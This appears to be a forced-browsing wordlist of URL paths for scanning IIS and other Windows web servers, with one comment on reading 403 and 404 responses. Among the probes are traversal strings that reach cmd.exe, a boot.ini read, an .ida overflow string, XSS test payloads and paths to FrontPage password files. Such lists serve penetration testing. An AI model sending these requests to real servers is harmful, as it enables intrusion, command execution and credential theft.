/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/a%5c.aspx
/AccessPlatform/
/AccessPlatform/auth/
/AccessPlatform/auth/clientscripts/
/AccessPlatform/auth/clientscripts/cookies.js 
/AccessPlatform/auth/clientscripts/login.js 
/admin/
/administration/
/administrator/
/Admin/knowledge/dsmgr/users/GroupManager.asp
/Admin/knowledge/dsmgr/users/UserManager.asp
/adovbs.inc
/adsamples/
/AdvWorks/equipment/catalog_type.asp
/ajfhasdfgsagfakjhgd
/archi~1/
/archiv~1/
/Archi~1/
/aspnet_files/
/aspnet_client/
/asp/
/asps/
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/_AuthChangeUrl?
/bin/
/bins/
/certcontrol/
/certenroll/
/certsrv/
/cfide/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/CFIDE/Administrator/startstop.html
/cgi/
/cgi-bin/
/cgi-bin/a1stats/a1disp.cgi
/cgi-bin/htimage.exe?2,2
/cgi-bin/htmlscript
/cgi-bin/imagemap.exe?2,2
/checkapache.html
/citrix/
/citrix/AccessPlatform/auth/
/citrix/AccessPlatform/auth/clientscripts/
/Citrix//AccessPlatform/auth/clientscripts/cookies.js 
/Citrix/AccessPlatform/auth/clientscripts/login.js 
/Citrix/PNAgent/config.xml
/clocktower
/cmsample/
/common/
/common~1/
/db/
/domcfg.nsf/?open
/Exadmin/
/Exchange/
/exchange/root.asp
/ExchWeb/
/forum_arc.asp
/forum.asp
/forum_professionnel.asp
/fpsample/
/help/
/iiasdmpwd/
/iisadmin/
/iisadmpwd/achg.htr
/iisadmpwd/aexp2b.htr
/iisadmpwd/aexp2.htr
/iisadmpwd/aexp3.htr
/iisadmpwd/aexp4b.htr
/iisadmpwd/aexp4.htr
/iisadmpwd/aexp.htr
/iisadmpwd/anot3.htr
/iisadmpwd/anot.htr
/iishelp/
/iishelp/iis/misc/default.asp
/iissamples/
/iissamples/exair/howitworks/Code.asp
/iissamples/exair/howitworks/Codebrw1.asp
/iissamples/exair/howitworks/Codebrws.asp
/iissamples/sdk/asp/docs/codebrw2.asp
/iissamples/sdk/asp/docs/codebrws.asp
/iissamples/sdk/asp/docs/CodeBrws.asp
/images/
/imprimer.asp
/includes/adovbs.inc
/index.php
/index.shtml
/inetpub/
/inetsrv/
/isapi/
/_layouts/alllibs.htm
/_layouts/settings.htm
/_layouts/userinfo.htm
# Look at the result codes in the headers - 403 likely mean the dir exists, 404  means not. It takes an ISAPI filter for IIS to return 404's for 403s. 
/Mail/smtp/Admin/smadv.asp
/market
/_mem_bin/
/_mem_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/_mem_bin/autoconfig.asp
/_mem_bin/formslogin.asp
/Micros~1/
/Microsoft-Server-ActiveSync/
/msadc/
/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/msadc/Samples/selector/showcode.asp
/msdac/root.exe?/c+dir
/mspress30
/%NETHOOD%/
/null.htw
/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHilite
/OMA/
/OWA/
/pbserver/
/pbserver/pbserver.dll
/postinfo.html
/.printer
/printers/
/_private
/progra~1
/Progra~1
/Public/
/publisher
/qwertypoiu.htw
/qwertypoiu.printer
/rubrique.asp
/samples/
/~/<script>alert('XSS')</script>.asp
/~/<script>alert('XSS')</script>.aspx
/<script>alert('XSS')</script>.aspx
/scripts/
/scripts/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir+c:\\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\
/scripts/cgimail.exe
/scripts/convert.bas
/scripts/counter.exe
/scripts/fpcount.exe
/scripts/iisadmin/ism.dll?http/dir
/scripts/no-such-file.pl
/scripts/root.exe?/c+dir
/scripts/samples/
/scripts/samples/search/webhits.exe
/scripts/tools/
/scripts/tools/getdrvs.exe
/scripts/tools/newdsn.exe
/search?NS-query-pat=..\..\..\..\..\boot.ini
/share/
/sites/
/siteserver/
/SiteServer/Admin
/SiteServer/Admin/commerce/foundation/driver.asp
/SiteServer/Admin/commerce/foundation/DSN.asp
/SiteServer/admin/findvserver.asp
/SiteServer/Admin/knowledge/dsmgr/default.asp
/siteserver/publishing/viewcode.asp
/SiteServer/Publishing/viewcode.asp
/Sites/Knowledge/Membership/Inspiredtutorial/Viewcode.asp
/Sites/Knowledge/Membership/Inspired/ViewCode.asp
/Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
/Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp
/Sites/Samples/Knowledge/Push/ViewCode.asp
/Sites/Samples/Knowledge/Search/ViewCode.asp
/system/
/system_web/
/test/
/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=goatfart+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2goatfart.html&newdb=CREA
/tsweb/
/vc30
/_fpclass/
/_vti_adm/
/_vti_aut/
/_vti_bin/
/_vti_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/_vti_bin/fpcount.exe?Page=default.asp|Image=3
/_vti_bin/shtml.dll
/_vti_bin/shtml.dll/asdfghjkl
/_vti_bin/shtml.exe/qwertyuiop
/_vti_bin/_vti_aut/dvwssr.dll
/_vti_bin/_vti_aut/fp30reg.dll
/_vti_bin/_vti_aut/fp30reg.dll?1234=X
/_vti_cnf/
/_vti_log/
/_vti_pvt/
/_vti_pvt/administrator.pwd
/_vti_pvt/administrators.pwd
/_vti_pvt/authors.pwd
/_vti_pvt/service.pwd
/_vti_pvt/shtml.exe
/_vti_pvt/users.pwd
/_vti_script
/_vti_txt
/web/
/_WEB_INF/
/WEB-INF/web.xml
/WebSer~1
/webpub/
/winnt/
/wwwroot/
/x.cfm
/x.htw
/x.htx
/x.ida
/x.ida?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=X
/x.idc
/x.idq
/x.pl
/x.shtml
/con/
/aux/
/con.aspx
/aux.aspx